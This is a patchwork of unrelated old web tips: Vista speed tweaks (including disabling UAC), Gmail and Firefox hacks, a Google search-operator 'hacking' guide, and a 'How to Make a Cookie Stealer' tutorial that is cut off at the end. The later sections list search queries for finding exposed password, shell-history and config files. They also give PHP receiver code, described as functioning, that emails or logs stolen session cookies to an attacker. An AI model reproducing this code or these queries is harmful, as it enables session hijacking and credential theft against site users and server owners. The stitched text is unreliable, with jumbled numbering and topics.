We all know Vista requires more hardware power, such as 2GB of RAM being almost a necessity to get decent performance, but are there Vista OS and software tweaks you can do to improve performance without buying better hardware? There certainly are, and our forum members are working together to collect them all.

1. Disable TMM

This tweak is responsible for about a 3-5 second delay and blank screen flash when you start Vista. It searches for external monitors but is unnecessary.

If you are not using an external monitor, or don't switch back and forth always then turn TMM off. This is responsible for a 3-5 second pause and blank flash you get when turning your computer on.

Here's how to fix that annoying black flicker on boot:

1. Go start/control panel/administrative options/task scheduler.
1. On the left-hand side, click "Task Scheduler Local" (you should already be there, but just in case).
2. Expand "Task Scheduler Library," then "Microsoft," then "Windows," then click "MobilePC."
3. Up top, you'll see a task called "TMM." Click it, and on the right-hand side, click "Disable."
4. You're done!

Start time reduced and blank flash gone!!!!

2. Use TuneXP 1.5 (TY and Rep Trebuin) (Click here)

This little XP program works great on Vista and reduces your boot time by reorganizing it. The program is phenomenal and has no side effects except a much quicker start speed. As you get more knowledgeable, there are a bunch of other great utilities in the program. Basically, it takes all your boot files and places them at the front of the disk.

This is the best tweak in our arsenal as there are several reports that it will cut your start time in half. I have verified this with my Vista 64-bit startup (20 seconds) and have cut my sons 32-bit Vista startup time in half to 40 seconds.

I use it on both my Vista 32 and 64 bit systems and it works great. Word to the wise though, dont use later versions. This version is the only tested for this.

1. Install the program and if asked to select a drive, select 'C'
2. Go to Memory and File System and Click on Ultra-Fast booting (it may appear to freeze but it's working)
3. Once it's done, it will inform you not to reboot your system until defragmentation is complete
4. Bring up your Task Manager from your system tray by right clicking in the tray bottom right and select Task Manager
5. Go to processes
6. You will see two processes relating to defrag. Dont restart your machine until they dissappear.

3. Disable Vista Search Indexing

All versions of Vista have Search Indexing enabled by default which is an unneeded resource for most. Its function is to continuously update files on your system so that they can be made available for faster searching. Unfortunately, this takes its toll on system performance which is why its listed in several tweaking programs as a top teak; I agree totally.

To disable Windows indexing:

1. Click Start, then computer;
2. Right click on Local Disk 'C:'
3. Left click on Properties;
4. Uncheck 'Index this Drive for Faster Searching';
5. Let it complete and select 'Include subfolders and files' in any subsequent dialog box

From here we will go one step further and turn off Windows Search in your services

1. Click on start/run and type in 'MSConfig' and hit ok
2. Click on Services tab and find Windows Search
3. Uncheck/Apply and Ok, you're done!!!

If you think you'll need search, don't mess with this, but if not it's a great way to speedup your system.

4. Get CCleaner, it Works with 32/64Bit (Click here)

CCleaner (formerly Crap Cleaner) is a freeware system optimization and privacy tool. It removes unused and temporary files from your system - allowing Windows to run faster, more efficiently and giving you more hard disk space. The best part is that it's fast (normally taking less than a second to run) and Free!

It cleans the following:

1. Internet Explorer Cache, History, Cookies, Index.dat
2. Recycle Bin, Temporary files and Log files
3. Recently opened URLs and files
4. Third-party application temp files and recent file lists (MRUs)
5. Including: Firefox, Opera, Media Player, eMule, Kazaa, Google Toolbar, Netscape, Office XP, Nero, Adobe Acrobat, WinRAR, WinAce, WinZip and more...

It also contains an 'Advanced Registry Scanner' and cleaner to remove unused and old entries to include File Extensions, ActiveX Controls, ClassIDs, ProgIDs, Uninstallers, Shared DLLs, Fonts, Help Files, Application Paths, Icons, Invalid Shortcuts and more...

There is also a Windows Startup editor as well as a back-up tool just in case you delete something your not supposed to.

5. Turn Off User Account Control (UAC)

This tweak is best followed after a 'clean' install with respect to the below listed advisory.

One of the most annoying things in Vista is the protection of your system through UAC. Before I knew how to disable it I considered throwing the system out the window. The purpose of UAC is to make you confirm a large number of everyday functions in order to somehow protect your system from malware infections. In any case heres how to shut it off (or turn it back on).

1. Click on start and then click on your username picture top right of the start menu.
2. Click on 'Turn User Account Control on or off.'
3. Uncheck (or check) User Account Control, select ok and restart.

Thats it except...

There needs to be a word of caution in turning UAC on and off. There is a process called virtualization that, when UAC is 'on' saves program data files (things like INI files, configuration files, saved game files etc.) within a totally separate area for each individual user. If you then turn UAC off, there have been reports that certain programs may be unable to find that saved data. The truth, in fact, is that the data is still there but only visible to the program in this 'virtualization folder' once UAC has been turned on again.

An example is... If UAC is on and you install some game, and the game then saves files to that program's main directory and subsequently you turn UAC off. Those files may appear to the game that they have been deleted when, in all actuality, they are stored in this folder and only accessible through virtualization when UAC is on.

6. Turn Off Unused Windows Features

This tweak is actually a 'two in one' as it saves disk space by turning off unneeded windows features as well as improving performance by shutting down Remote Differential Compression (RDC). Briefly, RDC monitors changes in files in order to transfer them with minimum compression over a network, thus eliminating the transfer of an entire file which has been already moved. This checking and rechecking can hinder system performance. With respect to the other features that I will suggest shutting off, I myself only leave Games, Ultimate Extras (both self explanatory) and Tablet PC. I choose to leave tablet PC as it enables a little feature called Snipping Tool which I absolutely love. Anyone who hasn't used it, type 'snipping tool' in the 'Run' box and enjoy.

In any case, the tweak is as follows:

1. Press Start/Control Panel/Classic View and select Programs and Features
2. Choose 'Turn Windows Features On and Off
3. You can safely unselect 'Indexing Service, Remote Differential Compression, Tablet PC Optional Components (if you don't want Snipping Tool), Windows DFS Replication Service, Windows Fax & Scan (unless you use Fax through a modem) and Windows Meeting Space.

And if you want to be really smart, DFS Replication duplicates files for use among multiple PCs in a network and keeps them in sync. It's not very useful on a stand alone.

7. Windows Snipping Tool IS AMAZING!

I let the cat out of the bag in the last tweak for #6, so I figured I might as well spill the beans. If you have Vista Premium or above you have a great new tool called Snipping Tool. It enables you to freeze whatever is on your screen and take a picture of it. You may notice that I use this in tons of my threads as it is so easy.

To get to it...

1. Click Start/All Programs/Accessories and you'll find the tool there, or...
2. Start 'Run' and type 'snippingtool'.

Just for a bit of a background, this is Microsofts description of 'The Tool'

NOTE: If you delete Tablet PC features from Vista, this will not work!

8. Eliminate Unneeded Startup Programs

When your computer starts, there are a number of programs that start automatically and remain running in the background which steal away much needed memory. They add up in time and although many have no real use to the average user, others can be eliminated from starting automatically and started from the 'All Programs' or 'Quick Launch' menu as required. My best example of this is Messenger (or AIM/ICQ) which starts and hogs valuable resources even when your not using it.

First lets see how to get there to see what we have shall we?

1. Type 'msconfig' in the Run command (or Windows key + R)
2. Press Start/Control Panel/Admin Tools/System Configuration/Startup; or
3. Download this excellent freeware program called Startup Inspector

I personally like the program for the new user because it has a consultant which, not only tells you what each program is, but also tells you which are required by the system, user chosen, recommended, not required or unknown.

Now what can we disable and eliminate from the startup process? This is much an individual choice but I personally have shut down all that start with 'NVIDIA, Messenger, Office, Nwiz, quicktime". Be careful not to turn off important processes, when in doubt don't disable a process, but if it's something obvious and you know you don't want it then disable it.

FIREFOX TRICKS,,,,

You may have installed countless add-on in Firefox to enhance your using experience, but if you want to get the most out of Firefox, you really have to hack your way into theabout:config.

The about:config page contains most (if not, all) of Firefox configuration options. It is so far the most effective, and the most powerful way to tweak and enhance your Firefox performance. Here are 28 of the popular tweaks.

Accessing your about:config page
In your Firefox, type about:config in the address bar.

Create bookmarklets for frequent searches

This form created by Steve Rubel generates a bookmarklet for searches in Gmail. (By the way, a bookmarklet is a baby bookmark that acts a single click tool for a webpage or browser—thanks, Wikipedia). Take Rubel’s form further by dragging the bookmarklets to your bookmarks bar.

. Resize your compose box

The aptly-named Resizeable Textarea Firefox extension allows you to click and drag the edge of your compose box without resizing your browser window. Note that any browser built with the newest Opensource.org webkit—Safari, for example—will already have this capability. For more browser info, check out the internet software category.

View unread messages first

Search on the string “label:unread label:inbox” to force all of your unread messages to the top of the list, writes Matt Cutts. (Note: you don’t have to create any labels for this to work.) Try bookmarking Cutts’s search and dragging it to your bookmarks bar to view all unread messages first.

Streamline adding attachments

Wouldn’t it be great if you could drop attachments directly into the attachment box? Check out the Firefox extension Dragdropupload if you are running Firefox 2.0 (as of this writing, it hadn’t been updated for 2.0.0.12).

Quickly switch between Google accounts

If you have multiple Google accounts—a Gmail with Google Apps account and a regular Gmail account, for example—streamline them with this script for Firefox with Greasemonkey. The script adds a “change user” drop-down bar in place of the “sign out” link.

You can also try Gmail Manager (also a Firefox extension), which adds a Gmail menu bar to the Firefox window. Juggle multiple accounts, sign in and out.

Bookmark a single email

As of November 2007, all Gmail messages have dedicated URLs (according to the official Gmail blog). Rather than killing a tree by printing the message or laboriously copying down the info, you can CTRL-D (or ?-D) an important email and refer to it at your leisure.

9. Automate frequently repeated text

Signature functionality is built into Gmail, but frequently typed phrases can be automated with Firefox extension Signature, which allows you to insert designated text with a keystroke. (As of this writing, Signature is not yet compliant with Firefox 2.0.0.12.) Also try a Windows app called AutoHotKey or Mac app TypeIt4Me. Both apps allow you to create keystrokes to automate text in virtually any application.

POP3 & IMAP forwarding

“I recommend using IMAP (where the mail is both on the server and on your local machine(s)/device(s)) and uploading all your email onto Gmail,” writes Mark Wheeler, a Gmail power user. “You can keep copies on the Google servers and your desktop/laptop/phone so that they are all efficiently accessible and available anytime anywhere. Don't have to worry about backups, or disk space...I have 25,000 emails and have only used 9% of my space!”

To upload old email like my friend did, set up a Gmail IMAP account in your desktop email client. In the client, establish folders that correspond to your Gmail labels, and drag and drop your non-Gmail into the folders. If you're using Outlook with .PST format or Outlook Express, you will have to convert or export the emails to mBox data file format before the messages will translate. The process may take some time, and your client may hang. Also, the original dates and times attached to the messages will appear in Gmail as the dates and times that the messages were imported into Gmail. But it's worth the trouble to utilize your tricked-out Gmail, right? Click here for a tutorial from My Digital Life.

Mute a conversation

Ever found yourself subscribed to a mailing list and the current conversation has nothing to do with you? If you don’t want to unsubscribe, you can easily stop the friendly spam with the Gmail mute function. Select a message in the thread and hit the m key to auto-archive all incoming messages in the conversation. The thread will stay muted until you unmute it; it will also un-mute itself if your address appears in the To or CC box.

12. Get it all in one place

Gmail’s built-in Mail Fetcher allows you to receive and send from up to five different accounts via POP3. Unlike a simple forwarding feature, Mail Fetcher allows synchronizing of your Gmail actions with the home server. Go to your Gmail Settings ? Accounts, then Add another mail account. One caveat of sending from non-Gmail accounts: the recipients may see FROM you@Gmail.com on behalf of you@otherdomain.com, especially if the recipients are using a client like Outlook.

13. Get it all in one place

With the Google Toolbar and Gmail combined, power user Steve Rubel has made his Gmail account into a massive archive of his interests. Steal his trick by adding the Google toolbar to your browser. When you happen across text or images you want to save, highlight them and click the send to Gmail link. Rubel has also tons of other great hints.

14. Secure your email

Work that requires maximum security—or run-of-the-mill paranoia—is made easier with this script with Greasemonkey + Firefox. It'll force a secure connection when accessing Gmail. To make sure you're as secure as you can be, check out the internet security category at the web directory.

15. Don't forget that attachment

If your sent folder is full of "Oops, here's the attachment" messages, this handy reminder Greasemonkey script will scan your messages--including replies and forwards--for references to attachments. (The release notes say that it searches for "attached," "attachment" or certain unknown variations.) If you mention an attachment and forget to add it, a prompt will pop up.

16. Gmail Notifier for Windows / Google Notifier for Mac

Rather than keeping a browser window open and hitting CTRL-R like you've got OCD, install a widget like Gmail Notifier for Windows or Google Notifier for Macs. It'll check your email (and Google Calendar, if you're a Mac user) as compulsively as you do. And as with almost everything else under the sun, there's a Firefox extension that will serve the same function (it's not released by Google).

17. Google Desktop Plug-In for Google Notifier

Some users have reported compatibility issues between Google Toolbar, Google Apps and Google Desktop. Everyone's configuration is different, blah blah blah, so it's impossible to know, but Maxim Alexeyev created this Google Desktop Plug-In which purports to replace Google Notifier for Google Desktop and Google Toolbar users. The plug-in also offers multi-username functions and Google Apps support.

18. Check Gmail from the couch with Apple Remote

Mac users who actually use their Apple Remotes (show of hands—anyone? anyone?) can check out this Lifehacker tutorial that lets you check your Gmail from your couch with Firefox shortcuts. There’s gotta be someone out there who needs this…

19. Read your Google Reader RSS feeds in Gmail

Treat your Google Reader RSS feeds the same way you treat old friends with this Greasemonkey + Firefox script. Feeds invading your Gmail will offer more-efficient time-wasting than ever before. Note that Google Reader and Gmail seem to be moving closer together in functionality and interface and it's likely that they'll soon be officially integrated.

20. Include or exclude Chat from search results

Chat conversations are automatically filed like emails with a Chat label, so to exclude Chat when searching, use the string -label:Chat. Conversely, to search only Chat conversations, use the string +label:Chat. The –label: and +label: syntax will work to exclude or include any label in Gmail search results. Another Jim Barr tip.

21. Use Gmail like an external hard drive

Use up any vegetating space in your Gmail account with this Windows drive shell extension. Your Gmail space appears in My Computer/Windows Explorer as an external drive, and when you drag and drop a file to the drive, it sends an email to your Gmail account with the file as an attachment. Note that this is a fairly old program but seems to have been updated for the latest Gmail version. Mac users can try gDisk and Linux users can check out GmailFS.

22. Spam counter hider

You’re browsing through your (overstuffed) inbox. You have many labels, filters and tricks that ensure that your email gets to you efficiently. Even so, you look at the number of messages in the spam folder and a small voice inside you says, “There could be something in the spam folder that doesn’t belong there!” Forget it. There never is. This Greasemonkey + Firefox script hides the spam count number, so the thought doesn’t even cross your mind.

23. Hack Gmail’s CSS

“Stylish is to CSS what Greasemonkey is to JavaScript,” says the Firefox extension page for Stylish. Cascade those style sheets yourself, or grab them from userstyles.org. For more web design tips and tricks, check out these web design and development resources.

24. Launch one-key composing with Launchy (Windows) or Quicksilver (Mac)

Launchy is a free, open source keyword launcher that runs in your system tray and opens apps with designated keystrokes. Launchy’s still “a far cry from Quicksilver for Mac” according to Gina Trapani at Lifehacker, but Adam Pash of Lifehacker says,
“I can't recommend it highly enough.” There’s a quick tutorial on one-key Gmail composing with Launchy—opening a browser logged into Gmail with a compose window with a single keystroke—here.

25. Better Gmail 2 with all-in-one Greasemonkey script

For a one-size-fits-all solution that combines several Greasemonkey scripts into one package, check out Better Gmail 2, which combines dozens of Greasemonkey scripts into one package. Allow HTML use in signatures, force a secure connection, convert labels into folders and make the spam folder invisible. There’s also a Better Gmail 2 extension for those using Firefox 3 beta. Cnet strongly recommends the extension in their review.

26. Create a podcast of your Gmail

Without an iPhone or Blackberry, the morning subway ride can get pretty boring. And you can’t navigate a smartphone while driving—or at least, you shouldn’t. Create an RSS feed from your Gmail account with this syntax:
https://username:password@gmail.google.com/gmail/feed/atom
Then sign for a FeedBurner account to host and distribute it. Use a RSS to podcast site like AudioDizer.com or one of the many options at NextUp to create text-to-speech files. Voila! This hack is based on a tip from Mike Donaghy. For even more, check out these podcast resources.

27. Force mailto: to open with Gmail

The annoyance of prompts from Outlook or Apple Mail with every mailto: link you click can be ended. This Greasemonkey script forces mailto: scripts to open Gmail. (Note: it’s unclear whether this script is compliant with the newest version of Gmail.)

28. Emulate a mail client

For those who can’t decide between a full-fledged mail client and browser-based Gmail, SimpleMail straddles the divide with a three-paned mail view. Mac users should note Adam Pash at Lifehacker warns that he had trouble getting IMAP to work with Firefox 3 on the Mac, but he doesn’t mention testing it with Firefox 2.0.0.12.

29. Sort mail with the Trusted Trio

Gina Trapani at Lifehacker suggests sorting your Gmail according to the Trusted Trio system—Follow Up, Hold and Archive. To keep the Inbox clear, sort all messages into one of these three categories. Since Gmail has an archive function built-in, Trapani suggests merely creating two labels—Follow Up and Hold; if desired, add numbers to get the two folders to display in the order you’d like. Check out the full explanation of the Trusted Trio system.

30. Pre-label and sort your mail

Many email providers, including Gmail, allow you to append your address with +something—for example, you can give all of your OS/2 user group buddies your address as you+OS2@gmail.com. (Note that Gmail addresses are not case sensitive). The incoming emails that wax nostalgic about IBM’s late great OS will be pre-labeled, and you can establish filters to sort them. The +something system also allows you to stop spam before it starts. If inappropriate emails with a designated +something address, you can kill off the address. You’ll also have an inkling how the spam got started. Thanks to Jim Barr for this tip.

31. Force Firefox extensions to work with Firefox 3 beta

This Lifehacker tip is for extreme power users only, as it could open your system to serious security flaws and bleeding edge malfunctions. It’s only a few easy steps after the jump. Have fun! User fluxam reports a list of extensions that were functioning in 3 beta as of 02/13/2008.

32. Add address-specific signatures with HTML

If you use multiple Gmail accounts, the Gmail HTML Signatures extension for Firefox + Greasemonkey automates the signature process. Based on the address you’re sending from, this extension will automatically insert HTML-formatted signatures.

33. Backup your Gmail

If you’re using a desktop or smartphone mail client, you’ve already got some backups of your email. But what if you’re all web-based? What if Gmail servers were hit by a nuclear bomb? Stop the paranoia and check the Gmail backup tutorial here and the Google Apps backup tips here.

34. Command line Gmail access (Windows) and nightly backup

There’s a tutorial—not for n00bs—here.

35. Force Gmail Notifier (Windows) to use SSL
This wikihow tutorial involves hex editing. Advanced Mac users with Google Notifier, here’s a comment on the O’Reilly Mac DevCenter forums that should help. Edit at your own risk.
When someone says Google, I think at least 60%-70% of people reply that it's a "Search Engine". Do you know that Google has so much thing going on that we don't even know it exist? Google has the ability to search for images, news, blogs, music, video, maps, products, answers, notebook, linux, apple, movies, definitions and the list goes on...

One thing I don't understand is why when we visit Google's URL (www.google.com), we only see a very simple and clean search page instead of a full featured page like Yahoo? At least now it's much better with a navigation bar where it shows Web, Images, Video, News, Maps, Gmail and more but it's still NOT complete.

Here's a quote taken from Don Norman's "The Truth About Google's Simplicity".

Why are Yahoo! and MSN such complex-looking places? Because their systems are easier to use. Not because they are complex, but because they simplify the life of their users by letting them see their choices on the home page: news, alternative searches, other items of interest. Yahoo! even has an excellent personalization page, so you can choose what you wish to see on that first page.

Take another careful look at Google's front page. Want a map? You have to click once to be offered the choice, then a second additional time to get to the map page. Want to use Google Scholar to check references? Um, well, is that "Advanced Search" or "more." What about their newly announced blog search? Why is Google maps separate from Google Earth? (Oh, those were purchased from different companies. Yes, but why should I, the user, care about the history of Google's acquisitions?)

Anyway, continue reading to check out the list of free and hidden services offered by google in ONE page.

Simply Google has created a page that includes every Google hidden feature.

Chris McEvoy created the original Simply Google but the latest updated version is at the link below. It has more links compared to the original version.

If your web browser's start page is Google.com, you might want to change it to Simply Google because it's more complete than the original and simple Google.com page.
Some Important Tips about Gmail

how2_gmail_1.jpgTired of stingy ISPs imposing arbitrary email restrictions on you? Yeah, so are we. 1MB attachment limits, 25MB storage limits, and restricted SMTP servers are sooo 1997. For a 21st-Century mail experience, step up to Gmail.

We know what you’re thinking: Webmail is webmail. But with 2.7GB of storage, 10MB attachment allowances, and an array of easy hacks that let you customize your mail account in almost any way you like, Gmail may be the most powerful e-mail tool the world has ever known. But enough of our yammering. Here’s how to turn your Gmail account into a messaging dynamo, and more.

1. Use Gmail as an Online Storage Vault
Need to keep important files handy? You don’t necessarily have to shell out 100 bucks for a high-capacity thumb drive. Instead, use Gmail’s free 2.7GB of storage as an off-site backup for the files you need access to. The easiest way is to simply attach your file to an email and shoot it to your Gmail account. Then you can retrieve it at any time just by logging in and running a quick search of your inbox. Of course, Gmail’s 10MB attachment limit means you won’t be able to archive massive documents. But it’s a great way keep your most essential files handy wherever there’s an Internet connection.

To take even greater advantage of Gmail’s free storage space, you’ll need to download a helper app. Firefox users can download Gmail Space from Mozilla’s Firefox Add-ons library, which turns the web browser into an easy-to-use file explorer. The extension lets you drag and drop files directly into Gmail’s storage space, without having to worry about the attachment size limit.

Alternatively, you can download Gmail Drive Shell Extension (free) for more ubiquitous access throughout your Windows PC. Gmail Drive Shell Extension sets up your Gmail storage space as a network drive on your PC, which you can access simply by double-clicking the GMail Drive icon in My Computer and then entering your Gmail username and password. Once you log in, your Gmail storage will act just like any other drive on your PC. It even works with Windows Vista.

2. Filter Your Mail with Positive Thinking
The lowly plus sign gets little respect in this crazy, mixed-up world. But if you use it the right way with Gmail, it could become your new best friend. By adding a plus sign and a filter tag to your own Gmail address, you can figure out which of the sites that you’ve brazenly given your address to are turning around, stabbing you in your tender, fleshy backside, and selling it to every half-witted Pr0p3cia spammer on the net.

This little hack doesn’t require a single tweak to your Gmail settings. Instead, just use the plus/tag every time you enter your address into an online form. Our favorite method is to use the name of the site you’re visiting as the tag, so it’s easy to track later on. So if you buy some vintage kicks at Raresneakers.com, enter your email address as username+raresneakers@gmail.com.

Gmail ignores the plus sign and everything that comes after it, so messages sent to that address will still make their way to you. But if that site sells your address to its spamifying associates, you’ll know just by peeking at the To address in the header. How you choose to exact revenge is entirely up to you.

You can also use this tip to set up filters for registration codes, listservs, and anything else!

how2_gmail_3a.jpg3. Take Notice with a Notifier
You don’t have to log into Gmail every time you want to see if you’ve got mail. Instead, download a Gmail notifier. Although it isn’t prominently featured on the Gmail site, Google’s own Gmail Notifier is a free download. If you’d rather not install a system tray icon, you can always use a Gmail plugin for Firefox. Gmail Checker is a low-profile plugin that requires barely a second thought to keep track of. But if you want to check multiple Gmail accounts from within Firefox, check out Gmail Manager.

4. Import Your Old Mail into Gmail
If you decide to switch to Gmail completely, you’ll probably want to bring your old contacts and messages along for the ride. Importing your contacts is easy (just click Import in the upper-right corner of the Contacts screen and select a CSV file exported from your old mail app). Importing your old email takes a little more doing.

One of the easiest ways to get your old mail into Gmail is to download Mark Lyon’s Gmail Loader (aka GML), which you can download from www.marklyon.org/gmail/. This simple little utility will transfer messages in the mBox format (including Thunderbird, Eudora, and Netscape mailboxes) into Gmail. Transferring your mail is as easy as downloading the app, launching it, entering your Gmail login info, browsing for your mailbox folder, and clicking Send to Gmail.

To transfer Outlook mailboxes, try Outport, which can transfer messages from Outlook to a host of other mail readers, including Gmail. Like GML, Outport has a fairly simple GUI that’s easy to navigate, so you can get the job done quickly and with a minimum of mucking around.

Sadly, Gmail will stamp all the imported mail with the date on which you do the import, rather than preserve the original received dates from each of your imported messages. However, you can still find imported messages by date, because the original received dates are retained within the body of the messages. So simply searching for “Nov 06” will help you find all messages from November of 2006.

how2_gmail_6.jpg5. Turn Gmail into an MP3 Player
In the interest of convenience, Gmail has its own built-in audio player for use with file attachments. You can put it to work as an online MP3 player by using labels and mail filters to sort your files.

First, set up a label called MP3. Next, set up a filter that searches for MP3 content by clicking Create a Filter at the top of the screen. Enter “mp3” in the “Has the words” field and check the box marked “Has attachment.” This will search for any messages with music files attached (including any you may have uploaded using the GMail Drive Shell Extension mentioned earlier). Now click Next Step and check the box marked “Apply the label” and choose the label MP3. Now any time you want to pump up some jams, you can click the MP3 label on the left side of your screen and pick a tune from the list.

6. Email Impersonator
Just because you’ve switched to Gmail, that doesn’t mean you have to give up your old email address. Gmail lets you send messages that appear to come from another address. In the settings pane, click Accounts and then choose “Add another email address,” then enter the address you’d like to use. To prevent you from ruining someone else’s life by masquerading as them on the Internet, Google will send a test message to verify that the address belongs to you. Then you can choose to make that new address your default identity, so nobody needs to know that you’re really sending from Gmail. To complete the transformation, set up a forwarder for your other address’s account, so that all of your mail reaches your Gmail account.
Who wouldn't know what Google is? I bet EVERYONE knows! Google is the, in my opinion, the best and most powerful search engine. Google is so powerful in searching that you can search for backdoor passwords, live webcam and etc through Google Hacking. I've even posted a tip on how to search and download MP3 using Google. Believe it or not, there's a website Toorgle, the web interface looks quite similar to Google, is able to search up to 200+ torrent websites and it now has over 5,000,000 torrents indexed. If you don't want to use software to do searches such as Torrent Harvester, you can try Toorgle.
Looks familiar eh? You can even add Toorgle to Firefox search bar. Meaning you can directly search for torrents by typing the keywords on the searchbar. Don't need to type the whole URL and wait for the website finish loading in order to make a search.
Google search engine can be used to hack into remote servers or gather confidential or sensitive information which are not visible through common searches.

Google is the world’s most popular and powerful search engine. It has the ability to accept pre-defined commands as inputs which then produces unbelievable results.

Google’s Advanced Search Query Syntax

Discussed below are various Google’s special commands and I shall be explaining each command in brief and will show how it can be used for getting confidential data.

[ intitle: ]

The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title.

intitle: login password

will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page.

Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title.

intitle: login intitle: password

is same as

allintitle: login password

[ inurl: ]

The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL.

Similarly, if one has to query for more than one word in an URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it.

allinurl: etc/passwd

will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google.

[ site: ]

The “site:” syntax restricts Google to query for certain keywords in a particular site or domain.

exploits site:hackingspirits.com

will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. There should not be any space between “site:” and the “domain name”.

[ filetype: ]

This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).

filetype:doc site:gov confidential

will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites.

[ link: ]

“link:” syntax will list down webpages that have links to the specified webpage.

link:www.expertsforge.com

will list webpages that have links pointing to the SecurityFocus homepage. Note there can be no space between the "link:" and the web page url.

[ related: ]

The “related:” will list web pages that are "similar" to a specified
web page.

related:www.expertsforge.com

will list web pages that are similar to the Securityfocus homepage. Note there can be no space between the "related:" and the web page url.

[ cache: ]

The query “cache:” will show the version of the web page that Google
has in its cache.

cache:www.hackingspirits.com

will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url.

If you include other words in the query, Google will highlight those words within the cached document.

cache:www.hackingspirits.com guest

will show the cached content with the word "guest" highlighted.

[ intext: ]

The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles.

intext:exploits

will return only links to those web pages that has the search keyword "exploits" in its webpage.

[ phonebook: ]

“phonebook” searches for U.S. street address and phone number information.

phonebook:Lisa+CA

will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering.

Google Hacks

Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for.

Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers.

Index Of

Using “Index of ” syntax to find sites enabled with Index browsing

A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” syntax to get a list links to webserver which has got directory browsing enabled will be discussd below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.

Index of /admin
Index of /passwd
Index of /password
Index of /mail

"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess

"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"

Looking for vulnerable sites or servers using “inurl:” or “allinurl:”

a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.

b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:

http://www.securiteam.com/exploits/2BUQ4S0SAW.html

c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.

d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.

For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following

Other similar search using “inurl:” or “allinurl:” combined with other syntax

inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php

inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

Looking for vulnerable sites or servers using “intitle:” or “allintitle:”

a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

Other similar search using “intitle:” or “allintitle:” combined with other syntax

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
How to Make a Cookie Stealer

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.

First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.

Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
